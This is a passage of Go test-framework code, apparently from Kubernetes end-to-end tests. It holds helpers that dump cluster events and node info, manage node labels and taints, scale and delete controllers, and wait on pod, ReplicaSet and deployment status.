Logf("At %v - event for %v: %v %v: %v", e.FirstTimestamp, e.InvolvedObject.Name, e.Source, e.Reason, e.Message)
}
// Note that we don't wait for any Cleanup to propagate, which means
// that if you delete a bunch of pods right before ending your test,
// you may or may not see the killing/deletion/Cleanup events.
}
func DumpAllNamespaceInfo(c clientset.Interface, namespace string) {
DumpEventsInNamespace(func(opts metav1.ListOptions, ns string) (*v1.EventList, error) {
return c.Core().Events(ns).List(opts)
}, namespace)
// If cluster is large, then the following logs are basically useless, because:
// 1. it takes tens of minutes or hours to grab all of them
// 2. there are so many of them that working with them are mostly impossible
// So we dump them only if the cluster is relatively small.
maxNodesForDump := 20
if nodes, err := c.Core().Nodes().List(metav1.ListOptions{}); err == nil {
if len(nodes.Items) <= maxNodesForDump {
dumpAllPodInfo(c)
dumpAllNodeInfo(c)
} else {
Logf("skipping dumping cluster info - cluster too large")
}
} else {
Logf("unable to fetch node list: %v", err)
}
}
// byFirstTimestamp sorts a slice of events by first timestamp, using their involvedObject's name as a tie breaker.
type byFirstTimestamp []v1.Event
func (o byFirstTimestamp) Len() int { return len(o) }
func (o byFirstTimestamp) Swap(i, j int) { o[i], o[j] = o[j], o[i] }
func (o byFirstTimestamp) Less(i, j int) bool {
if o[i].FirstTimestamp.Equal(o[j].FirstTimestamp) {
return o[i].InvolvedObject.Name < o[j].InvolvedObject.Name
}
return o[i].FirstTimestamp.Before(o[j].FirstTimestamp)
}
func dumpAllPodInfo(c clientset.Interface) {
pods, err := c.Core().Pods("").List(metav1.ListOptions{})
if err != nil {
Logf("unable to fetch pod debug info: %v", err)
}
logPodStates(pods.Items)
}
func dumpAllNodeInfo(c clientset.Interface) {
// It should be OK to list unschedulable Nodes here.
nodes, err := c.Core().Nodes().List(metav1.ListOptions{})
if err != nil {
Logf("unable to fetch node list: %v", err)
return
}
names := make([]string, len(nodes.Items))
for ix := range nodes.Items {
names[ix] = nodes.Items[ix].Name
}
DumpNodeDebugInfo(c, names, Logf)
}
func DumpNodeDebugInfo(c clientset.Interface, nodeNames []string, logFunc func(fmt string, args ...interface{})) {
for _, n := range nodeNames {
logFunc("\nLogging node info for node %v", n)
node, err := c.Core().Nodes().Get(n, metav1.GetOptions{})
if err != nil {
logFunc("Error getting node info %v", err)
}
logFunc("Node Info: %v", node)
logFunc("\nLogging kubelet events for node %v", n)
for _, e := range getNodeEvents(c, n) {
logFunc("source %v type %v message %v reason %v first ts %v last ts %v, involved obj %+v",
e.Source, e.Type, e.Message, e.Reason, e.FirstTimestamp, e.LastTimestamp, e.InvolvedObject)
}
logFunc("\nLogging pods the kubelet thinks is on node %v", n)
podList, err := GetKubeletPods(c, n)
if err != nil {
logFunc("Unable to retrieve kubelet pods for node %v", n)
continue
}
for _, p := range podList.Items {
logFunc("%v started at %v (%d+%d container statuses recorded)", p.Name, p.Status.StartTime, len(p.Status.InitContainerStatuses), len(p.Status.ContainerStatuses))
for _, c := range p.Status.InitContainerStatuses {
logFunc("\tInit container %v ready: %v, restart count %v",
c.Name, c.Ready, c.RestartCount)
}
for _, c := range p.Status.ContainerStatuses {
logFunc("\tContainer %v ready: %v, restart count %v",
c.Name, c.Ready, c.RestartCount)
}
}
HighLatencyKubeletOperations(c, 10*time.Second, n, logFunc)
// TODO: Log node resource info
}
}
// logNodeEvents logs kubelet events from the given node. This includes kubelet
// restart and node unhealthy events. Note that listing events like this will mess
// with latency metrics, beware of calling it during a test.
func getNodeEvents(c clientset.Interface, nodeName string) []v1.Event {
selector := fields.Set{
"involvedObject.kind": "Node",
"involvedObject.name": nodeName,
"involvedObject.namespace": metav1.NamespaceAll,
"source": "kubelet",
}.AsSelector().String()
options := metav1.ListOptions{FieldSelector: selector}
events, err := c.Core().Events(metav1.NamespaceSystem).List(options)
if err != nil {
Logf("Unexpected error retrieving node events %v", err)
return []v1.Event{}
}
return events.Items
}
// waitListSchedulableNodesOrDie is a wrapper around listing nodes supporting retries.
func waitListSchedulableNodesOrDie(c clientset.Interface) *v1.NodeList {
var nodes *v1.NodeList
var err error
if wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
nodes, err = c.Core().Nodes().List(metav1.ListOptions{FieldSelector: fields.Set{
"spec.unschedulable": "false",
}.AsSelector().String()})
return err == nil, nil
}) != nil {
ExpectNoError(err, "Timed out while listing nodes for e2e cluster.")
}
return nodes
}
// Node is schedulable if:
// 1) doesn't have "unschedulable" field set
// 2) it's Ready condition is set to true
// 3) doesn't have NetworkUnavailable condition set to true
func isNodeSchedulable(node *v1.Node) bool {
nodeReady := IsNodeConditionSetAsExpected(node, v1.NodeReady, true)
networkReady := IsNodeConditionUnset(node, v1.NodeNetworkUnavailable) ||
IsNodeConditionSetAsExpectedSilent(node, v1.NodeNetworkUnavailable, false)
return !node.Spec.Unschedulable && nodeReady && networkReady
}
// Test whether a fake pod can be scheduled on "node", given its current taints.
func isNodeUntainted(node *v1.Node) bool {
fakePod := &v1.Pod{
TypeMeta: metav1.TypeMeta{
Kind: "Pod",
APIVersion: api.Registry.GroupOrDie(v1.GroupName).GroupVersion.String(),
},
ObjectMeta: metav1.ObjectMeta{
Name: "fake-not-scheduled",
Namespace: "fake-not-scheduled",
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "fake-not-scheduled",
Image: "fake-not-scheduled",
},
},
},
}
nodeInfo := schedulercache.NewNodeInfo()
nodeInfo.SetNode(node)
fit, _, err := predicates.PodToleratesNodeTaints(fakePod, nil, nodeInfo)
if err != nil {
Failf("Can't test predicates for node %s: %v", node.Name, err)
return false
}
return fit
}
// GetReadySchedulableNodesOrDie addresses the common use case of getting nodes you can do work on.
// 1) Needs to be schedulable.
// 2) Needs to be ready.
// If EITHER 1 or 2 is not true, most tests will want to ignore the node entirely.
func GetReadySchedulableNodesOrDie(c clientset.Interface) (nodes *v1.NodeList) {
nodes = waitListSchedulableNodesOrDie(c)
// previous tests may have cause failures of some nodes. Let's skip
// 'Not Ready' nodes, just in case (there is no need to fail the test).
FilterNodes(nodes, func(node v1.Node) bool {
return isNodeSchedulable(&node) && isNodeUntainted(&node)
})
return nodes
}
func WaitForAllNodesSchedulable(c clientset.Interface, timeout time.Duration) error {
Logf("Waiting up to %v for all (but %d) nodes to be schedulable", timeout, TestContext.AllowedNotReadyNodes)
var notSchedulable []*v1.Node
attempt := 0
return wait.PollImmediate(30*time.Second, timeout, func() (bool, error) {
attempt++
notSchedulable = nil
opts := metav1.ListOptions{
ResourceVersion: "0",
FieldSelector: fields.Set{"spec.unschedulable": "false"}.AsSelector().String(),
}
nodes, err := c.Core().Nodes().List(opts)
if err != nil {
Logf("Unexpected error listing nodes: %v", err)
// Ignore the error here - it will be retried.
return false, nil
}
for i := range nodes.Items {
node := &nodes.Items[i]
if !isNodeSchedulable(node) {
notSchedulable = append(notSchedulable, node)
}
}
// Framework allows for <TestContext.AllowedNotReadyNodes> nodes to be non-ready,
// to make it possible e.g. for incorrect deployment of some small percentage
// of nodes (which we allow in cluster validation). Some nodes that are not
// provisioned correctly at startup will never become ready (e.g. when something
// won't install correctly), so we can't expect them to be ready at any point.
//
// However, we only allow non-ready nodes with some specific reasons.
if len(notSchedulable) > 0 {
// In large clusters, log them only every 10th pass.
if len(nodes.Items) >= largeClusterThreshold && attempt%10 == 0 {
Logf("Unschedulable nodes:")
for i := range notSchedulable {
Logf("-> %s Ready=%t Network=%t",
notSchedulable[i].Name,
IsNodeConditionSetAsExpectedSilent(notSchedulable[i], v1.NodeReady, true),
IsNodeConditionSetAsExpectedSilent(notSchedulable[i], v1.NodeNetworkUnavailable, false))
}
Logf("================================")
}
}
if len(notSchedulable) > TestContext.AllowedNotReadyNodes {
return false, nil
}
return allowedNotReadyReasons(notSchedulable), nil
})
}
func GetTTLAnnotationFromNode(node *v1.Node) (time.Duration, bool) {
if node.Annotations == nil {
return time.Duration(0), false
}
value, ok := node.Annotations[v1.ObjectTTLAnnotationKey]
if !ok {
return time.Duration(0), false
}
intValue, err := strconv.Atoi(value)
if err != nil {
Logf("Cannot convert TTL annotation from %#v to int", *node)
return time.Duration(0), false
}
return time.Duration(intValue) * time.Second, true
}
func AddOrUpdateLabelOnNode(c clientset.Interface, nodeName string, labelKey, labelValue string) {
ExpectNoError(testutils.AddLabelsToNode(c, nodeName, map[string]string{labelKey: labelValue}))
}
func ExpectNodeHasLabel(c clientset.Interface, nodeName string, labelKey string, labelValue string) {
By("verifying the node has the label " + labelKey + " " + labelValue)
node, err := c.Core().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
Expect(node.Labels[labelKey]).To(Equal(labelValue))
}
func RemoveTaintOffNode(c clientset.Interface, nodeName string, taint v1.Taint) {
ExpectNoError(controller.RemoveTaintOffNode(c, nodeName, &taint, nil))
VerifyThatTaintIsGone(c, nodeName, &taint)
}
func AddOrUpdateTaintOnNode(c clientset.Interface, nodeName string, taint v1.Taint) {
ExpectNoError(controller.AddOrUpdateTaintOnNode(c, nodeName, &taint))
}
// RemoveLabelOffNode is for cleaning up labels temporarily added to node,
// won't fail if target label doesn't exist or has been removed.
func RemoveLabelOffNode(c clientset.Interface, nodeName string, labelKey string) {
By("removing the label " + labelKey + " off the node " + nodeName)
ExpectNoError(testutils.RemoveLabelOffNode(c, nodeName, []string{labelKey}))
By("verifying the node doesn't have the label " + labelKey)
ExpectNoError(testutils.VerifyLabelsRemoved(c, nodeName, []string{labelKey}))
}
func VerifyThatTaintIsGone(c clientset.Interface, nodeName string, taint *v1.Taint) {
By("verifying the node doesn't have the taint " + taint.ToString())
nodeUpdated, err := c.Core().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
if v1helper.TaintExists(nodeUpdated.Spec.Taints, taint) {
Failf("Failed removing taint " + taint.ToString() + " of the node " + nodeName)
}
}
func ExpectNodeHasTaint(c clientset.Interface, nodeName string, taint *v1.Taint) {
By("verifying the node has the taint " + taint.ToString())
if has, err := NodeHasTaint(c, nodeName, taint); !has {
ExpectNoError(err)
Failf("Failed to find taint %s on node %s", taint.ToString(), nodeName)
}
}
func NodeHasTaint(c clientset.Interface, nodeName string, taint *v1.Taint) (bool, error) {
node, err := c.Core().Nodes().Get(nodeName, metav1.GetOptions{})
if err != nil {
return false, err
}
nodeTaints := node.Spec.Taints
if len(nodeTaints) == 0 || !v1helper.TaintExists(nodeTaints, taint) {
return false, nil
}
return true, nil
}
//AddOrUpdateAvoidPodOnNode adds avoidPods annotations to node, will override if it exists
func AddOrUpdateAvoidPodOnNode(c clientset.Interface, nodeName string, avoidPods v1.AvoidPods) {
err := wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
node, err := c.CoreV1().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
taintsData, err := json.Marshal(avoidPods)
ExpectNoError(err)
if node.Annotations == nil {
node.Annotations = make(map[string]string)
}
node.Annotations[v1.PreferAvoidPodsAnnotationKey] = string(taintsData)
_, err = c.CoreV1().Nodes().Update(node)
if err != nil {
if !apierrs.IsConflict(err) {
ExpectNoError(err)
} else {
Logf("Conflict when trying to add/update avoidPonds %v to %v", avoidPods, nodeName)
}
}
return true, nil
})
ExpectNoError(err)
}
//RemoveAnnotationOffNode removes AvoidPods annotations from the node. It does not fail if no such annotation exists.
func RemoveAvoidPodsOffNode(c clientset.Interface, nodeName string) {
err := wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
node, err := c.CoreV1().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
if node.Annotations == nil {
return true, nil
}
delete(node.Annotations, v1.PreferAvoidPodsAnnotationKey)
_, err = c.CoreV1().Nodes().Update(node)
if err != nil {
if !apierrs.IsConflict(err) {
ExpectNoError(err)
} else {
Logf("Conflict when trying to remove avoidPods to %v", nodeName)
}
}
return true, nil
})
ExpectNoError(err)
}
func getScalerForKind(internalClientset internalclientset.Interface, kind schema.GroupKind) (kubectl.Scaler, error) {
return kubectl.ScalerFor(kind, internalClientset)
}
func ScaleResource(
clientset clientset.Interface,
internalClientset internalclientset.Interface,
ns, name string,
size uint,
wait bool,
kind schema.GroupKind,
) error {
By(fmt.Sprintf("Scaling %v %s in namespace %s to %d", kind, name, ns, size))
scaler, err := getScalerForKind(internalClientset, kind)
if err != nil {
return err
}
waitForScale := kubectl.NewRetryParams(5*time.Second, 1*time.Minute)
waitForReplicas := kubectl.NewRetryParams(5*time.Second, 5*time.Minute)
if err = scaler.Scale(ns, name, size, nil, waitForScale, waitForReplicas); err != nil {
return fmt.Errorf("error while scaling RC %s to %d replicas: %v", name, size, err)
}
if !wait {
return nil
}
return WaitForControlledPodsRunning(clientset, ns, name, kind)
}
// Wait up to 10 minutes for pods to become Running.
func WaitForControlledPodsRunning(c clientset.Interface, ns, name string, kind schema.GroupKind) error {
rtObject, err := getRuntimeObjectForKind(c, kind, ns, name)
if err != nil {
return err
}
selector, err := getSelectorFromRuntimeObject(rtObject)
if err != nil {
return err
}
err = testutils.WaitForPodsWithLabelRunning(c, ns, selector)
if err != nil {
return fmt.Errorf("Error while waiting for replication controller %s pods to be running: %v", name, err)
}
return nil
}
func ScaleRC(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string, size uint, wait bool) error {
return ScaleResource(clientset, internalClientset, ns, name, size, wait, api.Kind("ReplicationController"))
}
func ScaleDeployment(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string, size uint, wait bool) error {
return ScaleResource(clientset, internalClientset, ns, name, size, wait, extensionsinternal.Kind("Deployment"))
}
// Returns true if all the specified pods are scheduled, else returns false.
func podsWithLabelScheduled(c clientset.Interface, ns string, label labels.Selector) (bool, error) {
PodStore := testutils.NewPodStore(c, ns, label, fields.Everything())
defer PodStore.Stop()
pods := PodStore.List()
if len(pods) == 0 {
return false, nil
}
for _, pod := range pods {
if pod.Spec.NodeName == "" {
return false, nil
}
}
return true, nil
}
// Wait for all matching pods to become scheduled and at least one
// matching pod exists. Return the list of matching pods.
func WaitForPodsWithLabelScheduled(c clientset.Interface, ns string, label labels.Selector) (pods *v1.PodList, err error) {
err = wait.PollImmediate(Poll, podScheduledBeforeTimeout,
func() (bool, error) {
pods, err = WaitForPodsWithLabel(c, ns, label)
if err != nil {
return false, err
}
for _, pod := range pods.Items {
if pod.Spec.NodeName == "" {
return false, nil
}
}
return true, nil
})
return pods, err
}
// Wait up to PodListTimeout for getting pods with certain label
func WaitForPodsWithLabel(c clientset.Interface, ns string, label labels.Selector) (pods *v1.PodList, err error) {
for t := time.Now(); time.Since(t) < PodListTimeout; time.Sleep(Poll) {
options := metav1.ListOptions{LabelSelector: label.String()}
pods, err = c.Core().Pods(ns).List(options)
Expect(err).NotTo(HaveOccurred())
if len(pods.Items) > 0 {
break
}
}
if pods == nil || len(pods.Items) == 0 {
err = fmt.Errorf("Timeout while waiting for pods with label %v", label)
}
return
}
// Wait for exact amount of matching pods to become running and ready.
// Return the list of matching pods.
func WaitForPodsWithLabelRunningReady(c clientset.Interface, ns string, label labels.Selector, num int, timeout time.Duration) (pods *v1.PodList, err error) {
var current int
err = wait.Poll(Poll, timeout,
func() (bool, error) {
pods, err := WaitForPodsWithLabel(c, ns, label)
if err != nil {
Logf("Failed to list pods: %v", err)
return false, nil
}
current = 0
for _, pod := range pods.Items {
if flag, err := testutils.PodRunningReady(&pod); err == nil && flag == true {
current++
}
}
if current != num {
Logf("Got %v pods running and ready, expect: %v", current, num)
return false, nil
}
return true, nil
})
return pods, err
}
func getRuntimeObjectForKind(c clientset.Interface, kind schema.GroupKind, ns, name string) (runtime.Object, error) {
switch kind {
case api.Kind("ReplicationController"):
return c.Core().ReplicationControllers(ns).Get(name, metav1.GetOptions{})
case extensionsinternal.Kind("ReplicaSet"):
return c.Extensions().ReplicaSets(ns).Get(name, metav1.GetOptions{})
case extensionsinternal.Kind("Deployment"):
return c.Extensions().Deployments(ns).Get(name, metav1.GetOptions{})
case extensionsinternal.Kind("DaemonSet"):
return c.Extensions().DaemonSets(ns).Get(name, metav1.GetOptions{})
case batchinternal.Kind("Job"):
return c.Batch().Jobs(ns).Get(name, metav1.GetOptions{})
default:
return nil, fmt.Errorf("Unsupported kind when getting runtime object: %v", kind)
}
}
func deleteResource(c clientset.Interface, kind schema.GroupKind, ns, name string, deleteOption *metav1.DeleteOptions) error {
switch kind {
case api.Kind("ReplicationController"):
return c.Core().ReplicationControllers(ns).Delete(name, deleteOption)
case extensionsinternal.Kind("ReplicaSet"):
return c.Extensions().ReplicaSets(ns).Delete(name, deleteOption)
case extensionsinternal.Kind("Deployment"):
return c.Extensions().Deployments(ns).Delete(name, deleteOption)
case extensionsinternal.Kind("DaemonSet"):
return c.Extensions().DaemonSets(ns).Delete(name, deleteOption)
case batchinternal.Kind("Job"):
return c.Batch().Jobs(ns).Delete(name, deleteOption)
default:
return fmt.Errorf("Unsupported kind when deleting: %v", kind)
}
}
func getSelectorFromRuntimeObject(obj runtime.Object) (labels.Selector, error) {
switch typed := obj.(type) {
case *v1.ReplicationController:
return labels.SelectorFromSet(typed.Spec.Selector), nil
case *extensions.ReplicaSet:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
case *extensions.Deployment:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
case *extensions.DaemonSet:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
case *batch.Job:
return metav1.LabelSelectorAsSelector(typed.Spec.Selector)
default:
return nil, fmt.Errorf("Unsupported kind when getting selector: %v", obj)
}
}
func getReplicasFromRuntimeObject(obj runtime.Object) (int32, error) {
switch typed := obj.(type) {
case *v1.ReplicationController:
if typed.Spec.Replicas != nil {
return *typed.Spec.Replicas, nil
}
return 0, nil
case *extensions.ReplicaSet:
if typed.Spec.Replicas != nil {
return *typed.Spec.Replicas, nil
}
return 0, nil
case *extensions.Deployment:
if typed.Spec.Replicas != nil {
return *typed.Spec.Replicas, nil
}
return 0, nil
case *batch.Job:
// TODO: currently we use pause pods so that's OK. When we'll want to switch to Pods
// that actually finish we need a better way to do this.
if typed.Spec.Parallelism != nil {
return *typed.Spec.Parallelism, nil
}
return 0, nil
default:
return -1, fmt.Errorf("Unsupported kind when getting number of replicas: %v", obj)
}
}
func getReaperForKind(internalClientset internalclientset.Interface, kind schema.GroupKind) (kubectl.Reaper, error) {
return kubectl.ReaperFor(kind, internalClientset)
}
// DeleteResourceAndPods deletes a given resource and all pods it spawned
func DeleteResourceAndPods(clientset clientset.Interface, internalClientset internalclientset.Interface, kind schema.GroupKind, ns, name string) error {
By(fmt.Sprintf("deleting %v %s in namespace %s", kind, name, ns))
rtObject, err := getRuntimeObjectForKind(clientset, kind, ns, name)
if err != nil {
if apierrs.IsNotFound(err) {
Logf("%v %s not found: %v", kind, name, err)
return nil
}
return err
}
selector, err := getSelectorFromRuntimeObject(rtObject)
if err != nil {
return err
}
reaper, err := getReaperForKind(internalClientset, kind)
if err != nil {
return err
}
ps, err := podStoreForSelector(clientset, ns, selector)
if err != nil {
return err
}
defer ps.Stop()
startTime := time.Now()
err = reaper.Stop(ns, name, 0, nil)
if apierrs.IsNotFound(err) {
Logf("%v %s was already deleted: %v", kind, name, err)
return nil
}
if err != nil {
return fmt.Errorf("error while stopping %v: %s: %v", kind, name, err)
}
deleteTime := time.Now().Sub(startTime)
Logf("Deleting %v %s took: %v", kind, name, deleteTime)
err = waitForPodsInactive(ps, 100*time.Millisecond, 10*time.Minute)
if err != nil {
return fmt.Errorf("error while waiting for pods to become inactive %s: %v", name, err)
}
terminatePodTime := time.Now().Sub(startTime) - deleteTime
Logf("Terminating %v %s pods took: %v", kind, name, terminatePodTime)
// this is to relieve namespace controller's pressure when deleting the
// namespace after a test.
err = waitForPodsGone(ps, 100*time.Millisecond, 10*time.Minute)
if err != nil {
return fmt.Errorf("error while waiting for pods gone %s: %v", name, err)
}
gcPodTime := time.Now().Sub(startTime) - terminatePodTime
Logf("Garbage collecting %v %s pods took: %v", kind, name, gcPodTime)
return nil
}
func DeleteRCAndPods(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string) error {
return DeleteResourceAndPods(clientset, internalClientset, api.Kind("ReplicationController"), ns, name)
}
// DeleteResourceAndWaitForGC deletes only given resource and waits for GC to delete the pods.
func DeleteResourceAndWaitForGC(c clientset.Interface, kind schema.GroupKind, ns, name string) error {
By(fmt.Sprintf("deleting %v %s in namespace %s, will wait for the garbage collector to delete the pods", kind, name, ns))
rtObject, err := getRuntimeObjectForKind(c, kind, ns, name)
if err != nil {
if apierrs.IsNotFound(err) {
Logf("%v %s not found: %v", kind, name, err)
return nil
}
return err
}
selector, err := getSelectorFromRuntimeObject(rtObject)
if err != nil {
return err
}
replicas, err := getReplicasFromRuntimeObject(rtObject)
if err != nil {
return err
}
ps, err := podStoreForSelector(c, ns, selector)
if err != nil {
return err
}
defer ps.Stop()
startTime := time.Now()
falseVar := false
deleteOption := &metav1.DeleteOptions{OrphanDependents: &falseVar}
err = deleteResource(c, kind, ns, name, deleteOption)
if err != nil && apierrs.IsNotFound(err) {
Logf("%v %s was already deleted: %v", kind, name, err)
return nil
}
if err != nil {
return err
}
deleteTime := time.Now().Sub(startTime)
Logf("Deleting %v %s took: %v", kind, name, deleteTime)
var interval, timeout time.Duration
switch {
case replicas < 100:
interval = 100 * time.Millisecond
case replicas < 1000:
interval = 1 * time.Second
default:
interval = 10 * time.Second
}
if replicas < 5000 {
timeout = 10 * time.Minute
} else {
timeout = time.Duration(replicas/gcThroughput) * time.Second
// gcThroughput is pretty strict now, add a bit more to it
timeout = timeout + 3*time.Minute
}
err = waitForPodsInactive(ps, interval, timeout)
if err != nil {
return fmt.Errorf("error while waiting for pods to become inactive %s: %v", name, err)
}
terminatePodTime := time.Now().Sub(startTime) - deleteTime
Logf("Terminating %v %s pods took: %v", kind, name, terminatePodTime)
err = waitForPodsGone(ps, interval, 10*time.Minute)
if err != nil {
return fmt.Errorf("error while waiting for pods gone %s: %v", name, err)
}
return nil
}
// DeleteRCAndWaitForGC deletes only the Replication Controller and waits for GC to delete the pods.
func DeleteRCAndWaitForGC(c clientset.Interface, ns, name string) error {
return DeleteResourceAndWaitForGC(c, api.Kind("ReplicationController"), ns, name)
}
// podStoreForSelector creates a PodStore that monitors pods from given namespace matching given selector.
// It waits until the reflector does a List() before returning.
func podStoreForSelector(c clientset.Interface, ns string, selector labels.Selector) (*testutils.PodStore, error) {
ps := testutils.NewPodStore(c, ns, selector, fields.Everything())
err := wait.Poll(100*time.Millisecond, 2*time.Minute, func() (bool, error) {
if len(ps.Reflector.LastSyncResourceVersion()) != 0 {
return true, nil
}
return false, nil
})
return ps, err
}
// waitForPodsInactive waits until there are no active pods left in the PodStore.
// This is to make a fair comparison of deletion time between DeleteRCAndPods
// and DeleteRCAndWaitForGC, because the RC controller decreases status.replicas
// when the pod is inactvie.
func waitForPodsInactive(ps *testutils.PodStore, interval, timeout time.Duration) error {
return wait.PollImmediate(interval, timeout, func() (bool, error) {
pods := ps.List()
for _, pod := range pods {
if controller.IsPodActive(pod) {
return false, nil
}
}
return true, nil
})
}
// waitForPodsGone waits until there are no pods left in the PodStore.
func waitForPodsGone(ps *testutils.PodStore, interval, timeout time.Duration) error {
return wait.PollImmediate(interval, timeout, func() (bool, error) {
if pods := ps.List(); len(pods) == 0 {
return true, nil
}
return false, nil
})
}
// Delete a ReplicaSet and all pods it spawned
func DeleteReplicaSet(clientset clientset.Interface, internalClientset internalclientset.Interface, ns, name string) error {
By(fmt.Sprintf("deleting ReplicaSet %s in namespace %s", name, ns))
rc, err := clientset.Extensions().ReplicaSets(ns).Get(name, metav1.GetOptions{})
if err != nil {
if apierrs.IsNotFound(err) {
Logf("ReplicaSet %s was already deleted: %v", name, err)
return nil
}
return err
}
reaper, err := kubectl.ReaperFor(extensionsinternal.Kind("ReplicaSet"), internalClientset)
if err != nil {
if apierrs.IsNotFound(err) {
Logf("ReplicaSet %s was already deleted: %v", name, err)
return nil
}
return err
}
startTime := time.Now()
err = reaper.Stop(ns, name, 0, nil)
if apierrs.IsNotFound(err) {
Logf("ReplicaSet %s was already deleted: %v", name, err)
return nil
}
deleteRSTime := time.Now().Sub(startTime)
Logf("Deleting RS %s took: %v", name, deleteRSTime)
if err == nil {
err = waitForReplicaSetPodsGone(clientset, rc)
}
terminatePodTime := time.Now().Sub(startTime) - deleteRSTime
Logf("Terminating ReplicaSet %s pods took: %v", name, terminatePodTime)
return err
}
// waitForReplicaSetPodsGone waits until there are no pods reported under a
// ReplicaSet selector (because the pods have completed termination).
func waitForReplicaSetPodsGone(c clientset.Interface, rs *extensions.ReplicaSet) error {
return wait.PollImmediate(Poll, 2*time.Minute, func() (bool, error) {
selector, err := metav1.LabelSelectorAsSelector(rs.Spec.Selector)
ExpectNoError(err)
options := metav1.ListOptions{LabelSelector: selector.String()}
if pods, err := c.Core().Pods(rs.Namespace).List(options); err == nil && len(pods.Items) == 0 {
return true, nil
}
return false, nil
})
}
// WaitForReadyReplicaSet waits until the replica set has all of its replicas ready.
func WaitForReadyReplicaSet(c clientset.Interface, ns, name string) error {
rs, err := c.Extensions().ReplicaSets(ns).Get(name, metav1.GetOptions{})
if err != nil {
return err
}
selector, err := metav1.LabelSelectorAsSelector(rs.Spec.Selector)
if err != nil {
return err
}
options := metav1.ListOptions{LabelSelector: selector.String()}
podList, err := c.Core().Pods(rs.Namespace).List(options)
if err != nil {
return err
}
readyPods := int32(0)
unready := sets.NewString()
for i := range podList.Items {
pod := podList.Items[i]
if podutil.IsPodReady(&pod) {
readyPods++
} else {
unready.Insert(pod.Name)
}
}
// All pods for our replica set are ready.
if *(rs.Spec.Replicas) == rs.Status.Replicas && *(rs.Spec.Replicas) == readyPods {
return nil
}
options.ResourceVersion = podList.ResourceVersion
w, err := c.Core().Pods(ns).Watch(options)
if err != nil {
return err
}
defer w.Stop()
condition := func(event watch.Event) (bool, error) {
if event.Type != watch.Modified {
return false, nil
}
pod := event.Object.(*v1.Pod)
if podutil.IsPodReady(pod) && unready.Has(pod.Name) {
unready.Delete(pod.Name)
}
return unready.Len() == 0, nil
}
_, err = watch.Until(Poll, w, condition)
if err == wait.ErrWaitTimeout {
err = fmt.Errorf("replica set %q never became ready", name)
}
return err
}
func NewDeployment(deploymentName string, replicas int32, podLabels map[string]string, imageName, image string, strategyType extensions.DeploymentStrategyType) *extensions.Deployment {
zero := int64(0)
return &extensions.Deployment{
ObjectMeta: metav1.ObjectMeta{
Name: deploymentName,
},
Spec: extensions.DeploymentSpec{
Replicas: &replicas,
Selector: &metav1.LabelSelector{MatchLabels: podLabels},
Strategy: extensions.DeploymentStrategy{
Type: strategyType,
},
Template: v1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Labels: podLabels,
},
Spec: v1.PodSpec{
TerminationGracePeriodSeconds: &zero,
Containers: []v1.Container{
{
Name: imageName,
Image: image,
},
},
},
},
},
}
}
// Waits for the deployment status to become valid (i.e. max unavailable and max surge aren't violated anymore).
// Note that the status should stay valid at all times unless shortly after a scaling event or the deployment is just created.
// To verify that the deployment status is valid and wait for the rollout to finish, use WaitForDeploymentStatus instead.
func WaitForDeploymentStatusValid(c clientset.Interface, d *extensions.Deployment) error {
return testutil.WaitForDeploymentStatusValid(c, d, Logf, Poll, pollLongTimeout)
}
// Waits for the deployment to reach desired state.
// Returns an error if the deployment's rolling update strategy (max unavailable or max surge) is broken at any times.
func WaitForDeploymentStatus(c clientset.Interface, d *extensions.Deployment) error {
var (
oldRSs, allOldRSs, allRSs []*extensions.ReplicaSet
newRS *extensions.ReplicaSet
deployment *extensions.Deployment
)
err := wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
var err error
deployment, err = c.Extensions().Deployments(d.Namespace).Get(d.Name, metav1.GetOptions{})
if err != nil {
return false, err
}
oldRSs, allOldRSs, newRS, err = deploymentutil.GetAllReplicaSets(deployment, c)
if err != nil {
return false, err
}
if newRS == nil {
// New RS hasn't been created yet.
return false, nil
}
allRSs = append(oldRSs, newRS)
// The old/new ReplicaSets need to contain the pod-template-hash label
for i := range allRSs {
if !labelsutil.SelectorHasLabel(allRSs[i].Spec.Selector, extensions.DefaultDeploymentUniqueLabelKey) {
return false, nil
}
}
totalCreated := deploymentutil.GetReplicaCountForReplicaSets(allRSs)
maxCreated := *(deployment.Spec.Replicas) + deploymentutil.MaxSurge(*deployment)
if totalCreated > maxCreated {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, allRSs)
return false, fmt.Errorf("total pods created: %d, more than the max allowed: %d", totalCreated, maxCreated)
}
minAvailable := deploymentutil.MinAvailable(deployment)
if deployment.Status.AvailableReplicas < minAvailable {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, allRSs)
return false, fmt.Errorf("total pods available: %d, less than the min required: %d", deployment.Status.AvailableReplicas, minAvailable)
}
// When the deployment status and its underlying resources reach the desired state, we're done
return deploymentutil.DeploymentComplete(deployment, &deployment.Status), nil
})
if err == wait.ErrWaitTimeout {
logReplicaSetsOfDeployment(deployment, allOldRSs, newRS)
logPodsOfDeployment(c, deployment, allRSs)
}
if err != nil {
return fmt.Errorf("error waiting for deployment %q status to match expectation: %v", d.Name, err)
}
return nil
}
// WaitForDeploymentUpdatedReplicasLTE waits for given deployment to be observed by the controller and has at least a number of updatedReplicas
func WaitForDeploymentUpdatedReplicasLTE(c clientset.Interface, ns, deploymentName string, minUpdatedReplicas int32, desiredGeneration int64) error {
err := wait.Poll(Poll, 5*time.Minute, func() (bool, error) {
deployment, err := c.Extensions().Deployments(ns).Get(deploymentName, metav1.GetOptions{})
if err != nil {
return false, err
}
